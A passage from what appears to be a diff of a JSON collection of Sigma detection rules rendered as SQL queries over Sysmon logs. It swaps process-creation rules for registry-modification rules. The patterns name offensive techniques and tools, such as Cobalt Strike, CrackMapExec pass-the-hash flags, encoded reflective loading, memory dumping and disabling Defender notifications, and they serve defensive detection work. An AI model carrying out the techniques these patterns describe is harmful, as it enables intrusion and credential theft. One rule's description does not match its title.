Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (Details LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR Details = 'grpconv -o' OR Details LIKE '%C:\\\\Program Files%' ESCAPE '\\' AND Details LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE 
'%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", - "status": "experimental", - 
"description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "status": "test", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Suspicious Kernel Dump 
Using Dtrace", - "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "status": "test", - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "author": "Florian Roth (Nextron Systems)", + "title": "Activate Suppression of Windows Security Center Notifications", + "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "status": "experimental", + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "author": "frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_dtrace_kernel_dump.yml" + "filename": "registry_set_suppress_defender_notifications.yml" }, { - "title": "CobaltStrike Process Patterns", - "id": "f35c5d71-b489-4e22-a115-f003df287317", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects applications being added to the \"allowed applications\" list 
of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%\\\\cmd.exe /C whoami%' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp%' ESCAPE '\\') OR ((CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\whoami.exe%' ESCAPE '\\') AND ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\runonce.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1%' ESCAPE '\\' AND (ParentCommandLine LIKE '%/C whoami%' ESCAPE '\\' OR ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR ParentCommandLine LIKE '%chrome-extension://%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning 
Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "status": "experimental", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Administrative scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" - }, - { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE 
'%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - 
"attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' 
OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" - }, - { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE 
'% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE 
